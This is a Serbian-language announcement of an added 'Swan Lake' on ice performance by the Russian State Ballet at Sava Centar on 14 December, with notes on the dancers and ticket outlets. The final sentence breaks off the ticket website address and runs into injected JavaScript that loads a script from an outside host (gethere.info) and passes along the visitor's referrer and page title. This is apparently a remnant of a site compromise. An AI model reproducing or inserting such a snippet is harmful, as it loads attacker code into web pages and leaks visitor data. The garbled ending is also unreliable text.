Labudovo jezero u Sava centru 14. decembra

Labudovo jezero u Sava centru 14. decembra


Zbog velikog interesovanja publike, dodata je nova predstava ’’Labudovog jezera’’ na ledu u Sava Centru 14.decembra u 18h.

Baletsko-scenski spektakl ’’Labudovo jezero’’ u izvođenju Ruskog državnog baleta iz Sankt Peterburga, osnovanog davne 1967 godine, predstavlja jedan od najlepših i najsofisticiranijih doživljaja kojeg možete da priuštite sebi i svojoj porodici.

Labudovo jezero (02)Pod budnim okom umetničkog direktora Konstantina Rasadina, školskog druga Rudolfa Nurejeva, preko četrdeset plesača u fantastičnim kostimima izvodi ovaj spektakl.

Oko dvadeset plesača Ruskog državnog baleta poseduje titulu Majstora sporta Rusije, a pored toga morali su da zadovolje visoke standarde u koreografiji, gracioznosti i umetničkom pristupu pokretu.

’’Koreografija za scenu je kao slika’’ tvrdi Rasadin ’’te publika može da je vidi samo iz jednog ugla. U baletu na ledu, ta slika je pokretna i vi je pratite iz svih uglova – svaki pokret je doveden do savršenstva.’’

Pogledajte promo video za Balet na ledu i uživajte u vrhunskom spektaklu ruskih umetnika:

Više informacija možete naći na: https://goo.gl/5r8Kd7

Ulaznice za ’’Labudovo jezero’’ na ledu možete nabaviti na blagajni Sava Centra, u WinWin shopovima i putem sajta www.ddtickets.rss.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;